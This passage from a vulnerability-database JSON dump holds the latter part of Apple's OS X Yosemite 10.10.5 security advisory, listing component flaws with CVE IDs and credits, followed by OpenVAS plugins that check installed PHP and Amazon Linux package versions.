syscalls.\r\nThis issue was addressed through improved lock state checking.\r\nCVE-ID\r\nCVE-2015-5757 : Lufeng Li of Qihoo 360\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\r\nto 2.9.2, the most serious of which may allow a remote attacker to\r\ncause a denial of service\r\nDescription: Multiple vulnerabilities existed in libxml2 versions\r\nprior to 2.9.2. These were addressed by updating libxml2 to version\r\n2.9.2.\r\nCVE-ID\r\nCVE-2012-6685 : Felix Groebert of Google\r\nCVE-2014-0191 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory access issue existed in libxml2. This was\r\naddressed by improved memory handling\r\nCVE-ID\r\nCVE-2014-3660 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory corruption issue existed in parsing of XML\r\nfiles. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3807 : Apple\r\n\r\nlibxpc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling of\r\nmalformed XPC messages. This issue was improved through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-3795 : Mathew Rowley\r\n\r\nmail_cmds\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary shell commands\r\nDescription: A validation issue existed in the mailx parsing of\r\nemail addresses. This was addressed by improved sanitization.\r\nCVE-ID\r\nCVE-2014-7844\r\n\r\nNotification Center OSX\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access all\r\nnotifications previously displayed to users\r\nDescription: An issue existed in Notification Center, which did not\r\nproperly delete user notifications. This issue was addressed by\r\ncorrectly deleting notifications dismissed by users.\r\nCVE-ID\r\nCVE-2015-3764 : Jonathan Zdziarski\r\n\r\nntfs\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in NTFS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nOpenSSH\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Remote attackers may be able to circumvent a time delay for\r\nfailed login attempts and conduct brute-force attacks\r\nDescription: An issue existed when processing keyboard-interactive\r\ndevices. This issue was addressed through improved authentication\r\nrequest validation.\r\nCVE-ID\r\nCVE-2015-5600\r\n\r\nOpenSSL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in OpenSSL versions prior\r\nto 0.9.8zg, the most serious of which may allow a remote attacker to\r\ncause a denial of service.\r\nDescription: Multiple vulnerabilities existed in OpenSSL versions\r\nprior to 0.9.8zg. These were addressed by updating OpenSSL to version\r\n0.9.8zg.\r\nCVE-ID\r\nCVE-2015-1788\r\nCVE-2015-1789\r\nCVE-2015-1790\r\nCVE-2015-1791\r\nCVE-2015-1792\r\n\r\nperl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted regular expression may lead to\r\ndisclosure of unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An integer underflow issue existed in the way Perl\r\nparsed regular expressions. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2013-7422\r\n\r\nPostgreSQL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker may be able to cause unexpected application\r\ntermination or gain access to data without proper authentication\r\nDescription: Multiple issues existed in PostgreSQL 9.2.4. These\r\nissues were addressed by updating PostgreSQL to 9.2.13.\r\nCVE-ID\r\nCVE-2014-0067\r\nCVE-2014-8161\r\nCVE-2015-0241\r\nCVE-2015-0242\r\nCVE-2015-0243\r\nCVE-2015-0244\r\n\r\npython\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Python 2.7.6, the most\r\nserious of which may lead to arbitrary code execution\r\nDescription: Multiple vulnerabilities existed in Python versions\r\nprior to 2.7.6. These were addressed by updating Python to version\r\n2.7.10.\r\nCVE-ID\r\nCVE-2013-7040\r\nCVE-2013-7338\r\nCVE-2014-1912\r\nCVE-2014-7185\r\nCVE-2014-9365\r\n\r\nQL Office\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted Office document may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of Office\r\ndocuments. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5773 : Apple\r\n\r\nQL Office\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML file may lead to\r\ndisclosure of user information\r\nDescription: An external entity reference issue existed in XML file\r\nparsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.\r\n\r\nQuartz Composer Framework\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted QuickTime file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of\r\nQuickTime files. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5771 : Apple\r\n\r\nQuick Look\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Searching for a previously viewed website may launch the web\r\nbrowser and render that website\r\nDescription: An issue existed where QuickLook had the capability to\r\nexecute JavaScript. The issue was addressed by disallowing execution\r\nof JavaScript.\r\nCVE-ID\r\nCVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3772\r\nCVE-2015-3779\r\nCVE-2015-5753 : Apple\r\nCVE-2015-5779 : Apple\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3765 : Joe Burnett of Audio Poison\r\nCVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-5751 : WalkerFuz\r\n\r\nSceneKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted Collada file may lead to\r\narbitrary code execution\r\nDescription: A heap buffer overflow existed in SceneKit's handling\r\nof Collada files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5772 : Apple\r\n\r\nSceneKit\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in SceneKit. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3783 : Haris Andrianakis of Google Security Team\r\n\r\nSecurity\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A standard user may be able to gain access to admin\r\nprivileges without proper authentication\r\nDescription: An issue existed in handling of user authentication.\r\nThis issue was addressed through improved authentication checks.\r\nCVE-ID\r\nCVE-2015-3775 : [Eldon Ahrold]\r\n\r\nSMBClient\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the SMB client.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3773 : Ilja van Sprundel\r\n\r\nSpeech UI\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted unicode string with speech\r\nalerts enabled may lead to an unexpected application termination or\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in handling of\r\nUnicode strings. This issue was addressed by improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-3794 : Adam Greenbaum of Refinitive\r\n\r\nsudo\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in sudo versions prior to\r\n1.7.10p9, the most serious of which may allow an attacker access to\r\narbitrary files\r\nDescription: Multiple vulnerabilities existed in sudo versions prior\r\nto 1.7.10p9. These were addressed by updating sudo to version\r\n1.7.10p9.\r\nCVE-ID\r\nCVE-2013-1775\r\nCVE-2013-1776\r\nCVE-2013-2776\r\nCVE-2013-2777\r\nCVE-2014-0106\r\nCVE-2014-9680\r\n\r\ntcpdump\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in tcpdump versions\r\nprior to 4.7.3. These were addressed by updating tcpdump to version\r\n4.7.3.\r\nCVE-ID\r\nCVE-2014-8767\r\nCVE-2014-8769\r\nCVE-2014-9140\r\n\r\nText Formats\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted text file may lead to\r\ndisclosure of user information\r\nDescription: An XML external entity reference issue existed with\r\nTextEdit parsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team\r\n\r\nudf\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3767 : beist of grayhash\r\n\r\nOS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:\r\nhttps://support.apple.com/en-us/HT205033\r\n\r\nOS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-08-17T00:00:00", "title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:00", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "modified": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32390", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32390", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-10-22T16:38:23", "references": ["http://www.php.net", "http://php.net/ChangeLog-5.php", "https://bugs.php.net/bug.php?id=69085", "http://openwall.com/lists/oss-security/2015/06/01/4"], "pluginID": "1361412562310805655", "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "edition": 8, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-16T00:00:00", "title": "PHP Multiple Vulnerabilities - 02 - Jun15 (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310805655", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805655", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_mult_vuln02_june15_win.nasl 2015-06-16 18:45:49 Jun$\n#\n# PHP Multiple Vulnerabilities - 02 - Jun15 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805655\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-4026\", \"CVE-2015-4025\", \"CVE-2015-4024\", \"CVE-2015-4022\",\n \"CVE-2015-4021\");\n script_bugtraq_id(75056, 74904, 74903, 74902, 74700);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-16 18:45:49 +0530 (Tue, 16 Jun 2015)\");\n script_name(\"PHP Multiple Vulnerabilities - 02 - Jun15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Algorithmic complexity vulnerability in the 'multipart_buffer_headers'\n function in main/rfc1867.c script in PHP.\n\n - 'pcntl_exec' implementation in PHP truncates a pathname upon encountering a\n \\x00 character.\n\n - Integer overflow in the 'ftp_genlist' function in ext/ftp/ftp.c script in PHP.\n\n - The 'phar_parse_tarfile' function in ext/phar/tar.c script in PHP does not\n verify that the first character of a filename is different from the\n \\0 character.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to cause a denial of service, bypass intended extension\n restrictions and access and execute files or directories with unexpected\n names via crafted dimensions and remote FTP servers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.4.41, 5.5.x before\n 5.5.25, and 5.6.x before 5.6.9\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP 5.4.41 or 5.5.25 or 5.6.9\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=69085\");\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2015/06/01/4\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n script_xref(name:\"URL\", value:\"http://www.php.net\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(phpVer =~ \"^5\\.5\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.5.0\", test_version2:\"5.5.24\"))\n {\n fix = \"5.5.25\";\n VULN = TRUE;\n }\n}\n\nif(phpVer =~ \"^5\\.6\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.6.0\", test_version2:\"5.6.8\"))\n {\n fix = \"5.6.9\";\n VULN = TRUE;\n }\n}\n\nif(phpVer =~ \"^5\\.4\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.4.41\"))\n {\n fix = \"5.4.41\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = 'Installed Version: ' + phpVer + '\\n' +\n 'Fixed Version: ' + fix + '\\n';\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-22T16:39:22", "references": ["http://www.php.net", "http://php.net/ChangeLog-5.php", "https://bugs.php.net/bug.php?id=69085", "http://openwall.com/lists/oss-security/2015/06/01/4"], "pluginID": "1361412562310805660", "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "edition": 8, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-16T00:00:00", "title": "PHP Multiple Vulnerabilities - 02 - Jun15 (Linux)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310805660", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805660", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_mult_vuln02_june15_lin.nasl 2015-06-16 18:45:49 Jun$\n#\n# PHP Multiple Vulnerabilities - 02 - Jun15 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805660\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-4026\", \"CVE-2015-4025\", \"CVE-2015-4024\", \"CVE-2015-4022\",\n \"CVE-2015-4021\");\n script_bugtraq_id(75056, 74904, 74903, 74902, 74700);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-16 18:45:49 +0530 (Tue, 16 Jun 2015)\");\n script_name(\"PHP Multiple Vulnerabilities - 02 - Jun15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Algorithmic complexity vulnerability in the 'multipart_buffer_headers'\n function in main/rfc1867.c script in PHP.\n\n - 'pcntl_exec' implementation in PHP truncates a pathname upon encountering a\n \\x00 character.\n\n - Integer overflow in the 'ftp_genlist' function in ext/ftp/ftp.c script in PHP.\n\n - The 'phar_parse_tarfile' function in ext/phar/tar.c script in PHP does not\n verify that the first character of a filename is different from the\n \\0 character.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to cause a denial of service, bypass intended extension\n restrictions and access and execute files or directories with unexpected\n names via crafted dimensions and remote FTP servers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.4.41, 5.5.x before\n 5.5.25, and 5.6.x before 5.6.9\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP 5.4.41 or 5.5.25 or 5.6.9\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=69085\");\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2015/06/01/4\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n script_xref(name:\"URL\", value:\"http://www.php.net\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(phpVer =~ \"^5\\.5\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.5.0\", test_version2:\"5.5.24\"))\n {\n fix = \"5.5.25\";\n VULN = TRUE;\n }\n}\n\nif(phpVer =~ \"^5\\.6\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.6.0\", test_version2:\"5.6.8\"))\n {\n fix = \"5.6.9\";\n VULN = TRUE;\n }\n}\n\nif(phpVer =~ \"^5\\.4\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.4.41\"))\n {\n fix = \"5.4.41\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = 'Installed Version: ' + phpVer + '\\n' +\n 'Fixed Version: ' + fix + '\\n';\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T14:31:35", "references": ["https://alas.aws.amazon.com/ALAS-2015-534.html"], "pluginID": "1361412562310120224", "description": "Amazon Linux Local Security Checks", "edition": 5, "reporter": "Eero Volotinen", "published": "2015-09-08T00:00:00", "title": "Amazon Linux Local Check: alas-2015-534", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "modified": "2018-10-01T00:00:00", "id": "OPENVAS:1361412562310120224", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120224", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-534.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120224\");\n script_version(\"$Revision: 11711 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:20:48 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: alas-2015-534\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in PHP. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update php54 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-534.html\");\n script_cve_id(\"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4025\", \"CVE-2015-4024\", \"CVE-2015-4026\", \"CVE-2015-2325\", \"CVE-2015-2326\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux 